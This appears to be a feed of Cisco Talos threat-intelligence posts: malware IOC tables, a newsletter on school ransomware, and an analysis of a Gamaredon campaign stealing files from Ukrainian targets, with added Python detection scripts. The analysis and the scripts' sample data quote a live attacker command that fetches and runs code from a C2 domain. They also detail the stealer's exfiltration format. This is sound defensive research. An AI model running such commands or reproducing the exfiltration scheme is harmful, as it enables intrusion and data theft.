00fdc4ec48b20f242022329109dc1e46b881a9f044f8d3d2c41c5071f13f284f 0a3b4186c412949b09fb35b24d0b7cfaab2726008c9dfd9ded81042678656a79 0bcfde1f70aeca56465e84252d3fed352a44686c52f1201e4474d5c126888842 17c40b93caacb07d7cb74d9bc9613780f3d346f5211323baa996e6516f830761 209ae4bb19c3fa5f5fd635e0bf9488ffc1b996edca12dcbd3771c5f6c560f9f9 2f64045ea223d08dd7556ac4d77b48153a96f881a0809e1c8ead0db9f6233884 36b098518b9abac620afde7568f084a592d1b43d50abdd8c70e030bca546b0e9 385203173d2547ac9df7af8711b18f9bff87c085e578e09a9a0999e2410a8744 41779f5ac5669c9d785d8348ee0cd0c03b31e0b260325995734cf67196eaa335 46ef92bfc91030701e6b5518deb8aba193a86e07ab8c63c0502a22e8acd9bc15 477038c22b79299bdd29784b5fa4d666735b962011b70f86fb6576fb690614b9 60214bf0cf8621867b6c69ffe98b203b8bec0c8f4a2144874b01f9f8c8a1cee6 a7157198068ee89caac77d8174b1e75bd71a42e0b3bb66ecbf9cbf05533f2153 bfdf0c6aa301a9305c58a7f3c4ef2a6b5ae2b3125600368acb8d0fb677e1b8a3 e602d598e6a30b8a9970e32469a499576fdc8bb987995add758221aa63142ed0

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  This has coverage
WSA                       This has coverage

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.Zeus-9969310-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
Mutexes                                          Occurrences
Local\{825579BC-847F-F0A5-3BC0-7CBFD652F80C}     1
Local\{A3F31C8C-E14F-D103-3BC0-7CBFD652F80C}     1
Local\{A3F31C8D-E14E-D103-3BC0-7CBFD652F80C}     1
GLOBAL\{<random GUID>}                           1

IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
193[.]143[.]97[.]30                              1

Files and/or directories created                 Occurrences
%TEMP%\tmp100f6b7d.bat                           1
%APPDATA%\Epxesy                                 1
%APPDATA%\Epxesy\veof.okx                        1
%APPDATA%\Tioxp                                  1
%APPDATA%\Tioxp\quem.exe                         1

File Hashes

*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.Nanocore-9969309-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
Mutexes                                          Occurrences
GLOBAL\{<random GUID>}                           9
54b220f4544a7115f31b                             2
2AC1A572DB6944B0A65C38C4140AF2F46386E886134      1
Global\534b56e0-35b0-11ed-9660-00151795f450      1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
checkip[.]dyndns[.]org                           3
monerohash[.]com                                 2
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes


Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       This has coverage

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Ransomware.Cerber-9969274-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Mutexes                                          Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}     26

IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
31[.]184[.]234[.]0/23                            26

Files and/or directories created                 Occurrences
%TEMP%\d19ab989                                  26
%TEMP%\d19ab989\4710.tmp                         26
%TEMP%\d19ab989\a35f.tmp                         26

File Hashes

*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.DarkKomet-9969269-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
Mutexes                                          Occurrences
Global\{08995C04-83FA-2613-1053-58F3B048D958}    23
Global\8bf66b81-fa0d-11ec-b5f8-00501e3ae7b6      1
GLOBAL\{<random GUID>}                           1
Local\{<random GUID>}                            1

Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
alchemistrywork[.]com                            1

Files and/or directories created                 Occurrences
%TEMP%\tmp25673c86.bat                           1
%APPDATA%\Otufux                                 1
%APPDATA%\Otufux\hyybo.exe                       1
%APPDATA%\Vooqwo                                 1
%APPDATA%\Vooqwo\bayk.qua                        1

File Hashes


Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.Ramnit-9969260-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys Occurrences
Mutexes Occurrences
*See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
*See JSON for more IOCs
Files and or directories created Occurrences
*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          This has coverage
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  This has coverage
WSA                       This has coverage

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.Kuluoz-9969050-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
Mutexes                                          Occurrences
aaAdministrator                                  15
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Files and/or directories created                 Occurrences
%LOCALAPPDATA%\<random, matching '[a-z]{8}'>.exe 15

File Hashes


Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Win.Dropper.Remcos-9969014-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry Keys                                              Occurrences
<HKCU>\SOFTWARE\ZANGARMARSH-228I7H                         13
<HKCU>\SOFTWARE\ZANGARMARSH-228I7H (Value Name: EXEpath)   13

Mutexes                                          Occurrences
Remcos_Mutex_Inj                                 13
Zangarmarsh-228I7H                               13

Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
ezpz1[.]xyz                                      13

Files and/or directories created                 Occurrences
%SystemRoot%\win.ini                             13
%APPDATA%\csrss.exe                              13
%System32%\Tasks\csrss                           13
%APPDATA%\javacache                              13
%APPDATA%\javacache\logs.dat                     13

File Hashes


Coverage

Product                   Protection
Secure Endpoint           This has coverage
Cloudlock                 N/A
CWS                       This has coverage
Email Security            This has coverage
Network Security          N/A
Stealthwatch              N/A
Stealthwatch Cloud        N/A
Secure Malware Analytics  This has coverage
Umbrella                  N/A
WSA                       N/A

Screenshots of Detection (images not reproduced in this text version): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK

Threat Source newsletter (Sept. 15, 2022) — Teachers have to be IT admins now, too

15 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Public schools in the United States already rely on our teachers for so much — they have to be educators, occasional parental figures, nurses, safety officers, law enforcement and much more. Slowly, they’re having to add “IT admin” to their list of roles. 

Educational institutions have increasingly become a target for ransomware attacks, an issue already highlighted this year by a major cyber attack on the combined Los Angeles school district in California that schools are still recovering from. 

Teachers there reported that during the week of the attack, they couldn’t enter attendance, lost lesson plans and presentations, and had to scrap homework plans. Technology has become ever-present in classrooms, so any minimal disruption in a school’s network or software can throw pretty much everything off. 

The last thing teachers need to worry about now is defending against a well-funded threat actor who may live thousands of miles away — but we’re not making it easy on them. 

I asked my mom, who is a paraeducator for kindergarten students, about this, and she told me each of her students (keep in mind these are mostly 5- and 6-year-olds) has their own Chromebook that they bring to and from home and use for homework assignments. The elementary school she works at has more than 500 students enrolled across six grades, and yet there’s only one person for the whole school who acts as their overall IT and network administrator. That’s one person to manage 500-plus laptops and even more devices like iPads and smartboards as you get into the older grades. If many working adults still need to be educated about the dangers of cyber attacks or about how to spot a spam text, how can we have the same expectations of kindergarteners?

I’m not saying this is a simple issue to fix — it would cost millions of dollars to invest in security infrastructure at schools across the U.S. and hire the necessary staff to manage these devices. But I do wonder if it’s a bridge too far for the burden we’re already placing on teachers.

Many of my friends who are educators are great teachers but would be far from computer experts, and I’m confident they’ve never thought about how secure the passwords that their students need to log into their laptops are.  

The FBI released a warning last week that the Vice Society ransomware group has increasingly been targeting schools across the U.S. and expects those attacks to continue as the school year ramps up. In the advisory, they said, “School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable.” If that’s the case, what happens if one of these underfunded districts is hit by a cyber attack? Rather than spending the year trying to beef up their security or implement new policies, they’ll instead just have to use up all their time and resources recovering from the attack and returning to square one. 

The teachers, IT admins and school leaders who are already stretched too thin will only be stretched further in the event of a cyber attack. So, before we start investing more money into getting technology into students’ hands in the classroom, it may be worth considering how those devices are meant to be protected and who will oversee protecting them. 
  

The one big thing 


Continuing our research into the well-known Lazarus Group, we have new details on a malware campaign with three different trojans targeting energy providers in the U.S., Canada and Japan. The newest malware is MagicRAT, which is deployed alongside two other RATs the Lazarus Group is known for. All three malware tools are being delivered via a targeted campaign that starts with the exploitation of the Log4j vulnerability in VMware Horizon. 

Why do I care? 

As we outlined in the newsletter last week, anything the Lazarus Group does is not to be taken lightly. And it’s particularly notable since they are targeting energy suppliers, highlighting the dangers that critical infrastructure faces from state-sponsored threat actors. Our research also shows the Lazarus Group is continually updating its malware and finding new ways to avoid detection.  

So now what? 

We’ve said this a thousand times already, but patch for Log4j in all software if you haven’t already since this is the primary infection method used in this campaign. Talos also released several new solutions for Cisco Secure to detect and prevent the malware used in these attacks.  

 

Top security headlines from the week


Twitter’s former head of security warned Congress about several potentially dangerous security practices at the social media giant. Peiter “Mudge” Zatko, one of the first “hackers” to enter mainstream culture, said in testimony that about 50 percent of Twitter’s employees could have access to sensitive user information, something he says he tried to prevent during his time at the company but was stopped. Zatko went so far as to directly tell U.S. Senators that their personal data could be at risk because of these practices, adding that the company is “misleading the public, lawmakers, regulators, and even its own board of directors.” The testimony came under additional scrutiny because of its potential influence on the ongoing battle regarding Elon Musk’s failed offer to buy Twitter. (Vox, Politico)

Montenegro’s government continues to grapple with a massive cyber attack, forcing many services offline at government offices and putting the country’s essential infrastructure, including banking, water and electrical power systems, at risk. Government officials stated that the attack resembles others from well-known Russian state-sponsored actors. The FBI even deployed a special cybersecurity team to the country to help with the recovery and remediation process. The Cuba ransomware group claimed responsibility for the attack, going as far as to say they created a special malware just for this campaign. Recent cyber attacks against NATO nations like Montenegro and Albania have raised questions about whether NATO’s Article 5 could be triggered by offensive cyber attacks. (Associated Press, NPR)

Apple released security updates for its mobile and desktop operating systems this week to patch zero-day vulnerabilities that attackers have actively exploited in the wild. CVE-2022-32917, according to Apple, could allow an attacker to execute arbitrary code with kernel privileges. This is the eighth zero-day vulnerability Apple disclosed this year. When updating iOS, users can upgrade to iOS 16, which also comes with several new security features. The new operating system includes a centralized privacy dashboard, safety checks for users who could be at risk of having their devices infected with spyware, and password-free logins on some sites. (9to5Mac, New York Times Wirecutter)


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

Most prevalent malware files from Talos telemetry over the past week  


MD5: a087b2e6ec57b08c0d0750c60f96a74c    
Typical Filename: AAct.exe    
Claimed Product: N/A      
Detection Name: PUA.Win.Tool.Kmsauto::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 8c69830a50fb85d8a794fa46643493b2 
Typical Filename: AAct.exe 
Claimed Product: N/A  
Detection Name: PUA.Win.Dropper.Generic::1201 

MD5: f1fe671bcefd4630e5ed8b87c9283534 
Typical Filename: KMSAuto Net.exe 
Claimed Product: KMSAuto Net  
Detection Name: PUA.Win.Tool.Hackkms::1201 

MD5: 0e4c49327e3be816022a233f844a5731 
Typical Filename: aact.exe 
Claimed Product: AAct x86 
Detection Name: PUA.Win.Tool.Kmsauto::in03.talos 

Gamaredon APT targets Ukrainian government agencies in new campaign

15 September 2022 at 12:02

By Asheer Malhotra and Guilherme Venere.

  • Cisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT that infects Ukrainian users with information-stealing malware.
  • The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine.
  • LNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase.
  • We discovered the use of a custom-made information stealer implant that can exfiltrate victim files of interest and deploy additional payloads as directed by the attackers.

Cisco Talos discovered Gamaredon APT activity targeting users in Ukraine with malicious LNK files distributed in RAR archives. The campaign, part of an ongoing espionage operation observed as recently as August 2022, aims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain. The infostealer is a dual-purpose malware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint.



The adversary uses phishing emails to deliver Microsoft Office documents containing remote templates with malicious VBScript macros. These macros download and open RAR archives containing LNK files that subsequently download and activate the next-stage payload on the infected endpoint. We observed considerable overlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this campaign and those used in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA) recently attributed to Gamaredon.

We also observed intrusion attempts against several Ukrainian entities. Based on these observations and Gamaredon's operational history of almost exclusively targeting Ukraine, we assess that this latest campaign is almost certainly directly targeting entities based in Ukraine.



Attack Chain

Initial Access


Gamaredon APT actors likely gained initial footholds into targeted networks through malicious Microsoft Office documents distributed via email. This is consistent with spear-phishing techniques common to this APT.

Malicious VBS macros concealed within remote templates execute when the user opens the document. The macros download RAR archives containing LNK files. The naming convention of the RAR archives in this campaign follows a similar pattern:

  • 31.07.2022.rar
  • 04.08.2022.rar
  • 10.08.2022.rar


These compressed archives usually contain just the LNK file. The LNK files and Microsoft Office document names contain references pertinent to the Russian invasion of Ukraine:


Execution


Once opened, the LNKs will attempt to execute MSHTA.EXE to download and parse a remote XML file to execute a malicious PowerShell script:

mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f

Gamaredon is known to use the domain xsph[.]ru. The servers in this campaign only allow access from IP addresses inside the Ukrainian address space.
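The mshta.exe launch above is the most visible host-side artifact of this stage, and the staging domains are all listed in the IOC section below. The following is an added detection example (not code from the Talos write-up): it scans simplified process-creation events, flags mshta.exe being launched with a remote URL argument, and raises the severity when the host matches one of the campaign's staging domains. The event format ("Image|CommandLine|ParentImage") and the sample events are constructed for the example; the domains come from the IOC list.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified to
# "Image|CommandLine|ParentImage"). Real telemetry carries plain http:// URLs; the
# campaign URL here is kept defanged as it appears in the write-up and refanged below.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|mshta.exe hxxp://a0704093.xsph[.]ru/bass/grudge.xml /f|C:\Windows\explorer.exe",
    r"C:\Windows\System32\mshta.exe|mshta.exe C:\Program Files\Vendor\setup.hta|C:\Program Files\Vendor\installer.exe",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c dir|C:\Windows\explorer.exe",
    r"C:\Windows\System32\mshta.exe|mshta.exe https://example.test/update.xml|C:\Windows\explorer.exe",
]

# Staging and C2 domains from the IOC section of the write-up (defanged form).
KNOWN_BAD_DOMAINS = ("xsph.ru", "celticso.ru", "kuckuduk.ru", "pasamart.ru", "motoristo.ru", "heato.ru")

URL_RE = re.compile(r"https?://([^\s/:]+)", re.IGNORECASE)


def refang(s: str) -> str:
    """Turn defanged notation (hxxp, [.]) back into real URL syntax so one regex covers both."""
    return s.replace("[.]", ".").replace("hxxp", "http").replace("HXXP", "http")


@dataclass
class Finding:
    severity: str       # "high" for a known campaign domain, "medium" for any remote URL
    host: str
    reason: str
    command_line: str
    parent_image: str


def analyze_event(line: str) -> Optional[Finding]:
    """Return a Finding for mshta.exe fetching remote content, None for anything else."""
    image, cmdline, parent = line.split("|", 2)
    if not image.lower().endswith("\\mshta.exe"):
        return None
    m = URL_RE.search(refang(cmdline))
    if not m:
        return None  # mshta.exe with a local .hta file: not the pattern described here
    host = m.group(1).lower()
    if any(host == d or host.endswith("." + d) for d in KNOWN_BAD_DOMAINS):
        return Finding("high", host, "mshta.exe fetching remote content from a known Gamaredon domain",
                       cmdline, parent)
    return Finding("medium", host, "mshta.exe fetching remote content over HTTP(S)", cmdline, parent)


def scan(lines: List[str]) -> List[Finding]:
    """Run analyze_event over a batch of events and keep only the hits."""
    return [f for f in (analyze_event(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.host}: {finding.command_line}")
```

The medium-severity branch is deliberately kept: mshta.exe pulling any remote URL is rare in managed environments and is worth a look even when the domain is not yet on a block list.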

This PowerShell script decodes and executes a second PowerShell script (instrumentor), which collects data from the victim and reports back to a remote server. This script also allows the remote server to send a PowerShell command or binary blob containing encrypted VBScript (VBS) code to be executed locally:

Second-stage PowerShell script that runs additional commands and payloads on the endpoint.

The instrumentor PowerShell script usually consists of a function that decodes the encrypted response from the command and control (C2) server and executes it as a VBScript object. The key used in the XOR decoder is calculated based on the machine's volume serial number plus index parameters passed in the response blob. This method makes it difficult to decode the malicious content if an observer looking at the data doesn't have both parameters available.

The PowerShell script also repeatedly captures the current user's screen. This code uses the "System.Windows.Forms" object to capture a copy of the virtual desktop, including setups with multiple screens. The screen capture is executed nine times, but the resulting screenshot is always saved to "%TEMP%\test.png", which gets overwritten every time. The resulting image (PNG file) is then converted to a base64-encoded string, stored in a variable and the screenshot image file is removed from the disk.

The script then proceeds to upload the victim's information to the remote server. The following information is then collected and exfiltrated to a hardcoded C2 URL:

  • Computer name.
  • Volume serial number.
  • Base64-encoded screenshot.


Upon sending the system information, the server response is parsed to see if there are commands to be executed. The entire script runs up to four times, so up to four different commands can be executed in each cycle.

The code checks if the first character is an exclamation point ("!"). If so, the remainder of the response is expected to be PowerShell code that is passed directly to IEX (Invoke-Expression). The output of that command is then added to the variable "cmd" and sent back to the C2 server.

If the response starts with any other character, it is treated as an encrypted blob and passed to the decoder function, along with the volume serial number to be decoded and executed as VBScript.

Infection chain diagram.


Payloads

Yet another PowerShell script


One of the payloads served to the instrumentor script was PowerShell code used to set an environment variable containing PowerShell code and a Registry RUN key to run it every time the user logs in.

PowerShell script setting up the RUN key to execute another PowerShell script stored in the environment variable.

There are two key components to this script:

  • The Get-IP function: This function queries a DNS lookup service for an attacker-specified domain and uses one of the returned IP addresses as the IP to download the next payloads.
  • Next-stage payload: The PowerShell script uses the IP address to construct a URL that serves the next-stage PowerShell script, which is subsequently stored in "$env:Include" and executed when the user logs in (via the HKCU\Run key).


Persistence script fetching the remote location's IP.

The PowerShell code residing in the environment variable is meant to provide the attackers with continued access to the infected endpoint with the capability to deploy additional payloads as desired. A similar PowerShell script was described in CERT-UA's recent alert describing intrusions conducted by Gamaredon in the first half of 2022 using the GammaLoad and GammaSteel implants.

PowerShell script stored in the env variable.

This script uses the same Get-IP() function to get a random IP assigned to the domain and queries a URL constructed from the IP address and a hardcoded extended resource. Just like the previous script, the computer name and volume serial number are used again in communications with the C2 server. The C2 server uses them to encode the next-stage payload subsequently served to the script.

If the response from the C2 starts with the string "http", the content is treated as the URL to download the final payload binary. The Volume Serial Number and Computer Name are passed to this URL and the response is decoded using the XorBytes function.

PowerShell function used to decode payloads from C2 server.

The decrypted binary is then saved to the "%TEMP%" folder with a name consisting of a random string of numbers and the ".exe" file extension and is executed.

Alternatively, if the response from the C2 does not begin with the "http" string, the content is treated as a VBS and executed via a COM object.

Infostealer


One of the executables deployed by the attackers via the PowerShell script consisted of an information stealer that exfiltrates files of specific extensions from the infected endpoint: .doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb. This is a new infostealer that Gamaredon has not previously used in other campaigns. We suspect it may be a component of Gamaredon's "Giddome" backdoor family, but we are unable to confirm that at this time.

The malicious binary keeps track of what has been exfiltrated in a file named "profiles_c.ini" in the "%USERPROFILE%\Appdata\Local" folder. The malware stores the MD5 hash of a string containing the filename, file size and modification date of the exfiltrated file.

Once started, the malware scans all attached storage devices looking for files with the aforementioned extensions. For each one, the malware makes a POST request with metadata about the exfiltrated file and its content.

POST data to exfiltrate files.

The parameter "p" contains metadata about the stolen file and the victim machine using the following format:

%u&&%s&&%s&&%s&&%s&&%s

Where the various parameters are:

<Hard_coded_value>&&<File_name>&&<File_Modification_Date_time>&&<FileSize>&&__&&<Computer_Name>&&<Username>&&<Victim_ID_randomly_generated_string_12_chars>&&<Volume Serial Number>

The raw content of the file comes after the metadata. The request is made to a random URI under the parent C2 domain. The implant generates a random 12-character string that acts as a subdomain for the C2 domain to send requests to:

E.g. <random_12_char_string>[.]celticso[.]ru
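For analysts working from proxy or packet captures, the "p" parameter above is the most useful field to decode because it names the stolen file and the victim. The following is an added example (not code from the Talos write-up) that parses the metadata according to the expanded nine-field layout given above and checks whether the request's Host is a 12-character label directly under the parent C2 domain. The sample request, its file name, host name, user name and serial number are all constructed for the example; the date format inside the field is an assumption, as the write-up does not specify it.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of the exfiltration request as a proxy might log it. The "p" value
# follows the layout from the write-up; every concrete value is made up (including the
# timestamp format, which the write-up does not specify).
SAMPLE_REQUEST = {
    "host": "qzkdjsmvxrta.celticso.ru",
    "p": "2&&report.docx&&2022-08-10 09:14:33&&48231&&__&&DESKTOP-7Q1K&&olena&&qzkdjsmvxrta&&A1B2C3D4",
}

FIELD_COUNT = 9                 # <hard_coded>&&<name>&&<mtime>&&<size>&&__&&<computer>&&<user>&&<victim_id>&&<vol_serial>
PARENT_C2 = "celticso.ru"       # from the IOC list
SUBDOMAIN_RE = re.compile(r"^[a-z0-9]{12}$", re.IGNORECASE)


@dataclass
class ExfilMetadata:
    hard_coded_value: str
    file_name: str
    file_mtime: str
    file_size: int
    computer_name: str
    username: str
    victim_id: str
    volume_serial: str


def parse_p(p: str) -> Optional[ExfilMetadata]:
    """Split the '&&'-delimited metadata field; return None if the layout does not match."""
    parts = p.split("&&")
    if len(parts) != FIELD_COUNT or parts[4] != "__":
        return None
    try:
        size = int(parts[3])
    except ValueError:
        return None
    if len(parts[7]) != 12:      # victim ID is described as a 12-character random string
        return None
    return ExfilMetadata(parts[0], parts[1], parts[2], size, parts[5], parts[6], parts[7], parts[8])


def is_campaign_host(host: str) -> bool:
    """True when Host is <12 random chars>.celticso.ru, the pattern the implant generates."""
    host = host.lower()
    suffix = "." + PARENT_C2
    if not host.endswith(suffix):
        return False
    label = host[: -len(suffix)]
    return bool(SUBDOMAIN_RE.match(label))


def triage(request: dict) -> Optional[dict]:
    """Combine both checks; None means the request shows neither indicator."""
    meta = parse_p(request.get("p", ""))
    host_hit = is_campaign_host(request.get("host", ""))
    if meta is None and not host_hit:
        return None
    return {"host_match": host_hit, "metadata": meta}


if __name__ == "__main__":
    result = triage(SAMPLE_REQUEST)
    if result:
        m = result["metadata"]
        print(f"host match: {result['host_match']}; stolen file: {m.file_name} ({m.file_size} bytes) "
              f"from {m.computer_name}\\{m.username}")
```

Because the file body follows the metadata in the same POST, a match on parse_p also tells you which file contents to carve out of the capture for the incident record.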

The implant will also search for the relevant file extensions in fixed and remote drives and specifically in the "C:\Users" folder. The implant enumerates all the files recursively in the directories on the system while avoiding enumeration of any folder containing the following strings in the path:

  • program files
  • program files (x86)
  • programdata
  • perflogs
  • prog
  • windows
  • appdata
  • local
  • roaming


Avoiding these folders is likely an attempt by the malware to avoid exfiltrating system files, thereby focusing only on user files of interest.

For each file exfiltrated to the C2, the implant calculates the MD5 hash for the following information and stores it in the "%LocalAppData%\profiles_c.ini" file:

<file_path><File_size><File_modification_date_time>

The implant also steals files from removable drives connected to the infected endpoint. When the implant finds a removable drive, it looks for files with the file extensions listed earlier. Once a file is found, the implant creates a randomly named folder in the %TEMP% directory and copies the original file from its original location to:

%Temp%\<randomly_named_folder>\connect\<removable_vol_serial_number>\<original file path>

For example, a user file found on a removable drive "E:" at path "E:\top_secret_docs\isengard.doc" will be copied to

"%temp%\randomly_named_folder\connect\<removable_vol_serial_number>\top_secret_docs\isengard.doc"

The contents of the folder in the temp directory are subsequently exfiltrated to the C2.

Deliver payloads


As with this actor's previous tools (e.g., the PS1 scripts), this binary also parses the server response and downloads additional payloads if requested. The response from the server consists of a flag indicating how the data should be treated:

Flag             Payload Type   Action
1                EXE            Written to disk and executed.
2                VBS            Written to disk and executed using wscript.exe.
Any other value  Blob of data   Written to a file on disk in the %TEMP% folder.

Code depicting the dropping of additional payloads.

There are other indications this malware may be present on the system, listed below:

  • A registry key is created under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the name "Windows Task" for persistence
  • A mutex is created with the name Global\flashupdate_r
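Both the persistence PowerShell script described earlier (a RUN key launching code kept in an environment variable) and the infostealer (a RUN value named "Windows Task", and payloads dropped as numerically named executables in %TEMP%) leave traces under the current user's Run key. The following is an added triage example (not code from the Talos write-up) that parses the output of reg query for that key and reports entries matching those traces. The reg query text, user name and paths are constructed; the "PowerShell reading $env:" heuristic is my generalisation of the $env:Include loader described above, not a rule from the write-up.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed output of: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# The value names, paths and user name are made up for this example.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\olena\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Windows Task    REG_SZ    C:\Users\olena\AppData\Local\Temp\4821397.exe
    Updater    REG_SZ    powershell.exe -w hidden -c "iex $env:Include"
    VendorTray    REG_SZ    "C:\Program Files\Vendor\tray.exe"
"""

# reg query separates name, type and data with four spaces; value names may contain spaces.
VALUE_LINE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_[A-Z_]+)\s{4}(.*)$")
# Dropped payload naming from the write-up: a random string of digits plus ".exe" in %TEMP%.
TEMP_NUMERIC_EXE_RE = re.compile(r"\\Temp\\\d+\.exe\b", re.IGNORECASE)
# Heuristic (assumption): a Run entry that starts PowerShell and dereferences an
# environment variable, matching the $env:Include loader pattern described above.
POWERSHELL_ENV_RE = re.compile(r"powershell(?:\.exe)?.*\$env:", re.IGNORECASE)


@dataclass
class RunEntry:
    name: str
    reg_type: str
    data: str


def parse_reg_query(text: str) -> List[RunEntry]:
    """Extract (name, type, data) triples from reg query output, ignoring the key header."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE_RE.match(line)
        if m:
            entries.append(RunEntry(*m.groups()))
    return entries


def suspicious_reasons(entry: RunEntry) -> List[str]:
    """Return every indicator from the write-up that this Run entry matches."""
    reasons = []
    if entry.name.strip().lower() == "windows task":
        reasons.append("Run value named 'Windows Task' (infostealer persistence name)")
    if TEMP_NUMERIC_EXE_RE.search(entry.data):
        reasons.append("numeric-named executable in %TEMP%")
    if POWERSHELL_ENV_RE.search(entry.data):
        reasons.append("PowerShell loader reading code from an environment variable")
    return reasons


def triage_run_keys(text: str) -> Dict[str, List[str]]:
    """Map each suspicious Run value name to the reasons it was flagged."""
    flagged = {}
    for entry in parse_reg_query(text):
        reasons = suspicious_reasons(entry)
        if reasons:
            flagged[entry.name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in triage_run_keys(SAMPLE_REG_QUERY).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The mutex name Global\flashupdate_r cannot be checked from exported text like this; it has to be inspected on the live host (for example with a handle-enumeration tool), so treat the Run-key hits as the starting point for that follow-up.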


Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

